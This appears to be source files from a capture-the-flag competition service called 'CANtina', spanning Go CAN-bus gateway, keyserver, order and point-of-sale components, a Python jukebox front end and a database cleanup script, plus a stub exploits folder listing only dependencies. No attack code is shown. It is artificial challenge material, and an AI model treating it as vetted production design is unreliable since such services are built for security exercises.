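-------------------------------------------------------------------------------- /cantina/exploits/jukebox/cantina: -------------------------------------------------------------------------------- 1 | ../../checkers/common/cantina/cantina/ -------------------------------------------------------------------------------- /cantina/exploits/requirements.txt: -------------------------------------------------------------------------------- 1 | msgpack 2 | pwn 3 | requests 4 | python-can 5 | -------------------------------------------------------------------------------- /cantina/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=cantina 2 | PROTECTED_FILES=gateway/** 3 | -------------------------------------------------------------------------------- /cantina/src/.gitignore: -------------------------------------------------------------------------------- 1 | ./venv/ 2 | --------------------------------------------------------------------------------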
/cantina/src/components/.dockerignore: -------------------------------------------------------------------------------- 1 | docker-compose.yml 2 | -------------------------------------------------------------------------------- /cantina/src/components/.gitignore: -------------------------------------------------------------------------------- 1 | data/ 2 | -------------------------------------------------------------------------------- /cantina/src/components/builder.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | docker buildx build --target copy -o out --file userdb-proxy/Dockerfile . 4 | docker buildx build --target copy -o out --file jukebox-proxy/Dockerfile . 5 | -------------------------------------------------------------------------------- /cantina/src/components/client/connect.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "cantina/client/connector" 5 | "cantina/common/can" 6 | "cantina/gateway/proxy" 7 | "fmt" 8 | "os" 9 | ) 10 | 11 | func main() { 12 | 13 | if len(os.Args) < 2 { 14 | fmt.Fprintln(os.Stderr, "Please provide a gw server address") 15 | return 16 | } 17 | 18 | addr := os.Args[1] 19 | 20 | canProx := connector.NewConnector( 21 | addr, 22 | ) 23 | 24 | canmsg := can.Message{ 25 | ArbitrationId: 999, 26 | Data: []byte("testingAAAAAAAAAAAA\x00"), 27 | } 28 | 29 | msg, _ := proxy.NewProxyMessageCanFrame(&canmsg) 30 | 31 | canProx.SendQueue() <- &msg 32 | 33 | for { 34 | val := <-canProx.RecvQueue() 35 | 36 | // TODO add error message type 37 | switch val.Type { 38 | case proxy.CanFrame: 39 | canmsg := new(can.Message) 40 | canmsg.Unmarshal(val.Data) 41 | fmt.Println(canmsg) 42 | } 43 | 44 | fmt.Println(val) 45 | } 46 | 47 | } 48 | -------------------------------------------------------------------------------- /cantina/src/components/client/go.mod: 
-------------------------------------------------------------------------------- 1 | module cantina/client 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | cantina/gateway v0.0.0-00010101000000-000000000000 8 | github.com/gordonklaus/portaudio v0.0.0-20220320131553-cc649ad523c1 9 | github.com/vmihailenco/msgpack v4.0.4+incompatible 10 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd 11 | ) 12 | 13 | require ( 14 | github.com/golang/protobuf v1.3.1 // indirect 15 | github.com/vmihailenco/msgpack/v5 v5.3.5 // indirect 16 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 17 | github.com/zekroTJA/timedmap v1.4.0 // indirect 18 | golang.org/x/net v0.0.0-20190603091049-60506f45cf65 // indirect 19 | google.golang.org/appengine v1.6.7 // indirect 20 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c // indirect 21 | ) 22 | 23 | replace cantina/gateway => ../gateway 24 | 25 | replace cantina/common => ../gocommon 26 | -------------------------------------------------------------------------------- /cantina/src/components/client/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "cantina/client/nes" 5 | "cantina/client/player" 6 | "fmt" 7 | "os" 8 | ) 9 | 10 | func main() { 11 | 12 | if len(os.Args) < 2 { 13 | fmt.Fprintln(os.Stderr, "Please provide a gw server address") 14 | return 15 | } 16 | 17 | addr := os.Args[1] 18 | 19 | apu := nes.NewAPU() 20 | player.Run(apu, addr) 21 | //APU.Step() 22 | println("hmm") 23 | } 24 | -------------------------------------------------------------------------------- /cantina/src/components/client/nes/controller.go: -------------------------------------------------------------------------------- 1 | package nes 2 | 3 | const ( 4 | ButtonA = iota 5 | ButtonB 6 | ButtonSelect 7 | ButtonStart 8 | ButtonUp 9 | ButtonDown 10 | ButtonLeft 11 | ButtonRight 12 | ) 13 | 14 | type Controller struct { 15 | buttons 
[8]bool 16 | index byte 17 | strobe byte 18 | } 19 | 20 | func NewController() *Controller { 21 | return &Controller{} 22 | } 23 | 24 | func (c *Controller) SetButtons(buttons [8]bool) { 25 | c.buttons = buttons 26 | } 27 | 28 | func (c *Controller) Read() byte { 29 | value := byte(0) 30 | if c.index < 8 && c.buttons[c.index] { 31 | value = 1 32 | } 33 | c.index++ 34 | if c.strobe&1 == 1 { 35 | c.index = 0 36 | } 37 | return value 38 | } 39 | 40 | func (c *Controller) Write(value byte) { 41 | c.strobe = value 42 | if c.strobe&1 == 1 { 43 | c.index = 0 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /cantina/src/components/client/player/run.go: -------------------------------------------------------------------------------- 1 | package player 2 | 3 | import ( 4 | "log" 5 | "runtime" 6 | 7 | "github.com/gordonklaus/portaudio" 8 | 9 | "cantina/client/nes" 10 | ) 11 | 12 | func init() { 13 | // we need a parallel OS thread to avoid audio stuttering 14 | runtime.GOMAXPROCS(2) 15 | 16 | // we need to keep OpenGL calls on a single thread 17 | //runtime.LockOSThread() 18 | } 19 | 20 | func Run(apu *nes.APU, serverAddress string) { 21 | // initialize audio 22 | portaudio.Initialize() 23 | defer portaudio.Terminate() 24 | 25 | audio := NewAudio() 26 | if err := audio.Start(); err != nil { 27 | log.Fatalln(err) 28 | } 29 | defer audio.Stop() 30 | 31 | apu.SetAudioChannel(audio.channel) 32 | apu.SetAudioSampleRate(audio.sampleRate) 33 | // run director 34 | director := NewDirector(audio, apu, serverAddress) 35 | director.Start() 36 | } 37 | -------------------------------------------------------------------------------- /cantina/src/components/gateway/.gitignore: -------------------------------------------------------------------------------- 1 | gateway 2 | -------------------------------------------------------------------------------- /cantina/src/components/gateway/Dockerfile: 
-------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | WORKDIR /cantina/gocommon 4 | 5 | #Set build arguments 6 | ARG BUILDOS 7 | ARG BUILDARCH 8 | ARG BUILDNAME 9 | 10 | COPY gocommon/go.mod gocommon/go.sum ./ 11 | RUN go mod tidy 12 | COPY gocommon/. ./ 13 | RUN mkdir /app && chown -R 1000:1000 /app 14 | 15 | ENV BUILDNAME=gateway 16 | 17 | WORKDIR /cantina/$BUILDNAME 18 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 19 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 20 | RUN go mod tidy 21 | COPY $BUILDNAME/. ./ 22 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./main.go 23 | WORKDIR /app 24 | 25 | FROM alpine:3.16 as gw-copy 26 | ENV BUILDNAME=gateway 27 | COPY --from=base /app/gateway /app/gateway 28 | CMD ["/app/gateway"] 29 | 30 | -------------------------------------------------------------------------------- /cantina/src/components/gateway/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/gateway 2 | 3 | go 1.19 4 | 5 | replace cantina/common => ../gocommon 6 | 7 | require ( 8 | cantina/common v0.0.0-00010101000000-000000000000 9 | github.com/vmihailenco/msgpack/v5 v5.3.5 10 | ) 11 | 12 | require github.com/zekroTJA/timedmap v1.4.0 // indirect 13 | 14 | require ( 15 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 16 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd 17 | ) 18 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/can/consts.go: -------------------------------------------------------------------------------- 1 | package can 2 | 3 | const CANFD_MAX_PAYLOAD = 64 4 | const CAN_MTU = 16 5 | const CANFD_MTU = 72 6 | const CAN_EFF_FLAG uint32 = 0x80000000 7 | const CAN_RTR_FLAG uint32 = 0x40000000 8 | const CAN_ERR_FLAG uint32 = 0x20000000 9 | const CAN_EXTENDED_MASK 
uint32 = 0x1FFFFFFF 10 | const CAN_STANDARD_MASK uint32 = 0x000007FF 11 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/extradata.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | import ( 4 | "errors" 5 | ) 6 | 7 | const edSize = 30 8 | 9 | type ExtraData struct { 10 | Value []byte 11 | } 12 | 13 | func (e ExtraData) FieldSize() int { 14 | return edSize 15 | } 16 | 17 | func (e ExtraData) ToBytes(dst []byte) []byte { 18 | data := make([]byte, edSize) 19 | if len(e.Value) > 0 { 20 | copy(data, e.Value[:]) 21 | } 22 | return append(dst, data...) 23 | } 24 | 25 | func (e *ExtraData) FromBytes(data []byte) (n int, err error) { 26 | if len(data) < edSize { 27 | err = errors.New("Not enough data for ExtraData") 28 | return 29 | } 30 | 31 | e.Value = make([]byte, edSize) 32 | copy(e.Value, data[:edSize]) 33 | n = edSize 34 | return 35 | } 36 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/field.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | type Field interface { 4 | FieldSize() int 5 | FromBytes([]byte) (int, error) 6 | ToBytes([]byte) []byte 7 | } 8 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/msglength.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | import ( 4 | "encoding/binary" 5 | "errors" 6 | ) 7 | 8 | const mlSize = 2 9 | 10 | type MessageLength struct { 11 | Value uint16 12 | } 13 | 14 | func (m MessageLength) FieldSize() int { 15 | return mlSize 16 | } 17 | 18 | func (m MessageLength) ToBytes(dst []byte) []byte { 19 | arr := [mlSize]byte{} 20 | binary.BigEndian.PutUint16(arr[:], m.Value) 21 | return append(dst, arr[:]...) 
22 | } 23 | 24 | func (m *MessageLength) FromBytes(data []byte) (n int, err error) { 25 | if len(data) < m.FieldSize() { 26 | err = errors.New("Not enough data for MessageLength") 27 | return 28 | } 29 | 30 | m.Value = binary.BigEndian.Uint16(data[:mlSize]) 31 | n = mlSize 32 | return 33 | } 34 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/fields/sequence.go: -------------------------------------------------------------------------------- 1 | package fields 2 | 3 | import ( 4 | "errors" 5 | ) 6 | 7 | const seqSize = 1 8 | 9 | type SequenceNumber struct { 10 | Value uint8 11 | } 12 | 13 | func (s SequenceNumber) FieldSize() int { 14 | return seqSize 15 | } 16 | 17 | func (s SequenceNumber) ToBytes(dst []byte) []byte { 18 | arr := [seqSize]byte{} 19 | arr[0] = s.Value 20 | return append(dst, arr[:]...) 21 | } 22 | 23 | func (s *SequenceNumber) FromBytes(data []byte) (n int, err error) { 24 | if len(data) < s.FieldSize() { 25 | err = errors.New("Not enough data for SequenceNumber") 26 | return 27 | } 28 | 29 | s.Value = data[:seqSize][0] 30 | n = seqSize 31 | return 32 | } 33 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/canopy/shared.go: -------------------------------------------------------------------------------- 1 | package canopy 2 | 3 | type MessageIds struct { 4 | Start uint32 5 | Data uint32 6 | ReplyStart uint32 7 | ReplyData uint32 8 | } 9 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/components/components.go: -------------------------------------------------------------------------------- 1 | package components 2 | 3 | import ( 4 | "cantina/common/can" 5 | ) 6 | 7 | type RecvHandler func(*can.Message) error 8 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/go.mod: 
-------------------------------------------------------------------------------- 1 | module cantina/common 2 | 3 | go 1.19 4 | 5 | require ( 6 | github.com/vmihailenco/msgpack/v5 v5.3.5 7 | github.com/zekroTJA/timedmap v1.4.0 8 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 9 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd 10 | ) 11 | 12 | require github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | -------------------------------------------------------------------------------- /cantina/src/components/gocommon/structs/tickets.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | type Ticket struct { 4 | _msgpack struct{} `msgpack:",as_array"` 5 | TicketId uint32 6 | Timestamp uint32 7 | } 8 | 9 | type TicketSigned struct { 10 | _msgpack struct{} `msgpack:",as_array"` 11 | TicketData []byte 12 | Signature []byte 13 | } 14 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY jukebox-front/requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY jukebox-front/. 
/app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | EXPOSE 10024 22 | 23 | CMD /app/run.sh 24 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | Authlib==1.0.1 3 | certifi==2022.6.15.1 4 | cffi==1.15.1 5 | click==8.1.3 6 | cryptography==38.0.1 7 | h11==0.12.0 8 | httpcore==0.15.0 9 | httpx==0.23.0 10 | idna==3.3 11 | itsdangerous==2.1.2 12 | Jinja2==3.1.2 13 | kaitaistruct==0.10 14 | MarkupSafe==2.1.1 15 | pycparser==2.21 16 | python-multipart==0.0.5 17 | PyYAML==6.0 18 | rfc3986==1.5.0 19 | six==1.16.0 20 | sniffio==1.3.0 21 | starlette==0.20.4 22 | starlette-authlib==0.1.12 23 | uvicorn==0.18.3 24 | aiosqlite 25 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10024 --reload --debug 4 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS files ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL, 5 | track TEXT NOT NULL, 6 | game TEXT NOT NULL, 7 | author TEXT NOT NULL, 8 | filename TEXT NOT NULL 9 | ); 10 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/assets/jukebox.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/src/components/jukebox-front/static/assets/jukebox.jpg -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/css/custom.css: -------------------------------------------------------------------------------- 1 | .top-nav { 2 | padding: var(--spacing); 3 | border-bottom: 1px solid #343434; 4 | background-color: #11191f; 5 | position: fixed; 6 | top: 0; 7 | left: 0; 8 | right: 0; 9 | width: 100%; 10 | z-index: 9999; 11 | } 12 | 13 | .menu-item-image { 14 | text-align: center; 15 | } 16 | 17 | #app { 18 | margin-top: 5rem; 19 | } 20 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | CANtina: Jukebox 9 | 10 | 11 | 13 | 14 |
15 |
16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/nav/AbstractNav.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_info) { 3 | this.user_info = user_info; 4 | } 5 | 6 | async getHtml() { 7 | return ` 8 | 11 | `; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/nav/Auth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 17 | `; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/nav/UnAuth.js: -------------------------------------------------------------------------------- 1 | import AbstractNav from "./AbstractNav.js"; 2 | 3 | export default class extends AbstractNav { 4 | constructor(user_info) { 5 | super(user_info); 6 | } 7 | 8 | async getHtml() { 9 | const base = await super.getHtml(); 10 | return ` 11 | ${base} 12 | 16 | `; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/static/js/views/AbstractView.js: -------------------------------------------------------------------------------- 1 | export default class { 2 | constructor(user_data) { 3 | this.user_data = user_data; 4 | } 5 | 6 | setTitle(title) { 7 | document.title = title; 8 | } 9 | 10 | async registerEventHandlers() { 11 | } 12 | 13 | async getHtml() { 14 | return ""; 15 | } 16 | } 17 | 
-------------------------------------------------------------------------------- /cantina/src/components/jukebox-front/vgm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/src/components/jukebox-front/vgm/__init__.py -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/jukebox/structs.go: -------------------------------------------------------------------------------- 1 | package jukebox 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "cantina/common/tickets" 8 | "cantina/jukebox/streamer" 9 | jtickets "cantina/jukebox/tickets" 10 | "log" 11 | ) 12 | 13 | type Env struct { 14 | SymmCipher *cipher.Cipher 15 | KeyExchange *kex.Client 16 | Log *log.Logger 17 | 18 | UserDbRequest *canopy.Client 19 | 20 | JukeboxRequest *canopy.Server 21 | JukeboxReplyBuilder canopy.ReplyBuilder 22 | 23 | UserRequest *canopy.Server 24 | UserRequestBuilder canopy.ReplyBuilder 25 | UserRequestSession canopy.SessionInitialization 26 | 27 | TicketManager *tickets.TicketManager 28 | UserTicketManager *jtickets.UserTicketManager 29 | 30 | Streamer *streamer.Streamer 31 | 32 | DataDir string 33 | } 34 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/routes/context.go: -------------------------------------------------------------------------------- 1 | package routes 2 | 3 | import "cantina/jukebox/jukebox" 4 | 5 | type RouterContext struct { 6 | Env *jukebox.Env 7 | } 8 | -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/static/cantina.vgm: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/src/components/jukebox-proxy/static/cantina.vgm -------------------------------------------------------------------------------- /cantina/src/components/jukebox-proxy/structs/structs.go: -------------------------------------------------------------------------------- 1 | package structs 2 | 3 | type Ticket struct { 4 | _msgpack struct{} `msgpack:",as_array"` 5 | TicketId uint32 6 | Timestamp uint32 7 | } 8 | 9 | type TicketSigned struct { 10 | _msgpack struct{} `msgpack:",as_array"` 11 | TicketData []byte 12 | Signature []byte 13 | } 14 | 15 | type FileTicket struct { 16 | _msgpack struct{} `msgpack:",as_array"` 17 | TicketId string 18 | Timestamp uint32 19 | } 20 | 21 | type SignedRequest struct { 22 | Data string 23 | Signature string 24 | } 25 | 26 | type FileAccessRequest struct { 27 | Cmd string 28 | Dir string 29 | User string 30 | File string 31 | Ticket FileTicket 32 | } 33 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/.gitignore: -------------------------------------------------------------------------------- 1 | keyserver 2 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | #Set build arguments 4 | ARG BUILDOS 5 | ARG BUILDARCH 6 | ARG BUILDNAME 7 | 8 | RUN apk add build-base 9 | 10 | WORKDIR /cantina/gocommon 11 | COPY gocommon/go.mod gocommon/go.sum ./ 12 | RUN go mod tidy 13 | COPY gocommon/. 
./ 14 | 15 | RUN mkdir /app && chown -R 1000:1000 /app 16 | 17 | ENV BUILDNAME=keyserver 18 | WORKDIR /cantina/$BUILDNAME 19 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 20 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 21 | RUN go mod tidy 22 | COPY $BUILDNAME/ . 23 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./keyserver.go 24 | WORKDIR /app 25 | 26 | FROM alpine:3.16 as ksv-copy 27 | ENV BUILDNAME=keyserver 28 | COPY --from=base /app/$BUILDNAME /app/ksv 29 | CMD ["/app/ksv"] 30 | 31 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/keyserver 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | github.com/vmihailenco/msgpack/v5 v5.3.5 8 | golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 9 | ) 10 | 11 | require ( 12 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 // indirect 14 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd // indirect 15 | ) 16 | 17 | replace cantina/common => ../gocommon 18 | -------------------------------------------------------------------------------- /cantina/src/components/keyserver/ks/structs.go: -------------------------------------------------------------------------------- 1 | package ks 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "log" 8 | ) 9 | 10 | type Env struct { 11 | SymmCipher *cipher.Cipher 12 | KeyExchange *kex.Server 13 | Log *log.Logger 14 | 15 | TicketCreation *canopy.Server 16 | TicketReplyBuilder canopy.ReplyBuilder 17 | 18 | DataDir string 19 | } 20 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/.gitignore: 
-------------------------------------------------------------------------------- 1 | order-db 2 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | #Set build arguments 4 | ARG BUILDOS 5 | ARG BUILDARCH 6 | ARG BUILDNAME 7 | 8 | RUN apk add build-base 9 | 10 | WORKDIR /cantina/gocommon 11 | COPY gocommon/go.mod gocommon/go.sum ./ 12 | RUN go mod tidy 13 | COPY gocommon/. ./ 14 | 15 | RUN mkdir /app && chown -R 1000:1000 /app 16 | 17 | ENV BUILDNAME=order-db 18 | WORKDIR /cantina/$BUILDNAME 19 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 20 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 21 | RUN go mod tidy 22 | COPY $BUILDNAME/. ./ 23 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./order-db.go 24 | WORKDIR /app 25 | 26 | FROM alpine:3.16 as odb-copy 27 | ENV BUILDNAME=order-db 28 | COPY --from=base /app/$BUILDNAME /app/odb 29 | CMD ["/app/odb"] 30 | 31 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/order-db 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | github.com/vmihailenco/msgpack/v5 v5.3.5 8 | golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 9 | ) 10 | 11 | require ( 12 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 // indirect 14 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd // indirect 15 | ) 16 | 17 | replace cantina/common => ../gocommon 18 | -------------------------------------------------------------------------------- /cantina/src/components/order-db/odb/structs.go: 
-------------------------------------------------------------------------------- 1 | package odb 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "log" 8 | ) 9 | 10 | type Env struct { 11 | SymmCipher *cipher.Cipher 12 | KeyExchange *kex.Client 13 | Log *log.Logger 14 | 15 | OrderCreation *canopy.Server 16 | OrderCreationBuilder canopy.ReplyBuilder 17 | 18 | OrderPickup *canopy.Server 19 | OrderPickupBuilder canopy.ReplyBuilder 20 | OrderPickupSession canopy.SessionInitialization 21 | 22 | DataDir string 23 | } 24 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/.gitignore: -------------------------------------------------------------------------------- 1 | point-of-sale 2 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.19-alpine as base 2 | 3 | #Set build arguments 4 | ARG BUILDOS 5 | ARG BUILDARCH 6 | ARG BUILDNAME 7 | 8 | RUN apk add build-base 9 | 10 | WORKDIR /cantina/gocommon 11 | COPY gocommon/go.mod gocommon/go.sum ./ 12 | RUN go mod tidy 13 | COPY gocommon/. ./ 14 | 15 | RUN mkdir /app && chown -R 1000:1000 /app 16 | 17 | ENV BUILDNAME=point-of-sale 18 | WORKDIR /cantina/$BUILDNAME 19 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 20 | COPY $BUILDNAME/go.mod $BUILDNAME/go.sum ./ 21 | RUN go mod tidy 22 | COPY $BUILDNAME/. 
./ 23 | RUN go build -v -o /app/$BUILDNAME -ldflags "-s -w" ./point-of-sale.go 24 | WORKDIR /app 25 | 26 | FROM alpine:3.16 as pos-copy 27 | ENV BUILDNAME=point-of-sale 28 | COPY --from=base /app/$BUILDNAME /app/pos 29 | COPY ./point-of-sale/order-items.yaml /app 30 | CMD ["/app/pos"] 31 | 32 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/order-items.yaml: -------------------------------------------------------------------------------- 1 | categories: 2 | - name: "Pasta" 3 | items: 4 | - id: 0 5 | name: "Carbonara" 6 | price: 10 7 | image_url: "carbonara.jpg" 8 | - name: "Pizza" 9 | items: 10 | - id: 0 11 | name: "Pizza Hawaii" 12 | price: 15 13 | image_url: "cancer.jpg" 14 | 15 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/pos/structs.go: -------------------------------------------------------------------------------- 1 | package pos 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "cantina/common/tickets" 8 | "log" 9 | "sync" 10 | ) 11 | 12 | type Env struct { 13 | SymmCipher *cipher.Cipher 14 | KeyExchange *kex.Client 15 | OrderCreation *canopy.Client 16 | TicketCreation *canopy.Client 17 | Log *log.Logger 18 | OrderItems *ItemOverview 19 | TicketManager *tickets.TicketManager 20 | GamebotPubKey []byte 21 | SessionLock sync.RWMutex 22 | } 23 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/routes/context.go: -------------------------------------------------------------------------------- 1 | package routes 2 | 3 | import ( 4 | "cantina/point-of-sale/pos" 5 | ) 6 | 7 | type RouterContext struct { 8 | Env *pos.Env 9 | } 10 | -------------------------------------------------------------------------------- /cantina/src/components/point-of-sale/routes/items.go: 
-------------------------------------------------------------------------------- 1 | package routes 2 | 3 | import ( 4 | "net/http" 5 | "github.com/gin-gonic/gin" 6 | ) 7 | 8 | 9 | func (rc *RouterContext) GetMenuItems(c *gin.Context) { 10 | c.JSON(http.StatusOK, rc.Env.OrderItems) 11 | } 12 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.6-alpine 2 | # make sure to use a tag that won't be updated by the image maintainers 3 | 4 | RUN addgroup -S cantina && adduser -S cantina -G cantina 5 | 6 | RUN mkdir /app 7 | RUN mkdir /data 8 | RUN chown -R cantina:cantina /data 9 | RUN chown -R cantina:cantina /app 10 | WORKDIR /app 11 | 12 | # download and install the dependencies first, so these steps can be skipped 13 | # when teams update their service 14 | COPY requirements.txt /app/requirements.txt 15 | RUN pip install -r requirements.txt 16 | 17 | COPY . 
/app/ 18 | RUN chmod a+x /app/run.sh 19 | 20 | USER cantina 21 | #CMD python main.py 22 | EXPOSE 10026 23 | 24 | CMD /app/run.sh 25 | 26 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/cleanup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import signal 3 | import sqlite3 4 | import os 5 | from pathlib import Path 6 | from threading import Event 7 | 8 | 9 | def do_cleanup(data_dir: Path): 10 | # Purge rows of the users table whose created value is at least 30 minutes old, in the user.db file under data_dir, and print how many rows were deleted 11 | con = sqlite3.connect(data_dir / "user.db") 12 | with con: # sqlite3's connection context manager commits or rolls back the transaction; it does not close the connection 13 | cur = con.cursor() 14 | cur.execute('delete from users where created <= datetime("now", "-30 minute")') # NOTE(review): "now" and "-30 minute" are double-quoted, which SQLite accepts as string literals only through its legacy fallback; single-quoted SQL literals would not depend on that 15 | print(f"Deleted rows: {cur.rowcount}") 16 | con.close() # NOTE(review): not reached if execute() raises, since no try/finally surrounds it 17 | 18 | 19 | if __name__ == '__main__': 20 | stop = Event() 21 | 22 | def quit(_, __): # signal handler: only sets the stop event (the name shadows the builtin quit) 23 | stop.set() 24 | for sig in('TERM', 'HUP', 'INT'): # route SIGTERM, SIGHUP and SIGINT to the handler above 25 | signal.signal(getattr(signal, 'SIG'+sig), quit) 26 | 27 | data_dir = Path(os.environ.get("DATA_DIR", "/data")) 28 | 29 | while not stop.is_set(): 30 | do_cleanup(data_dir) 31 | stop.wait(120) # wait up to 120 s between passes; returns early once a signal sets stop 32 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/requirements.txt: -------------------------------------------------------------------------------- 1 | anyio==3.6.1 2 | click==8.1.3 3 | 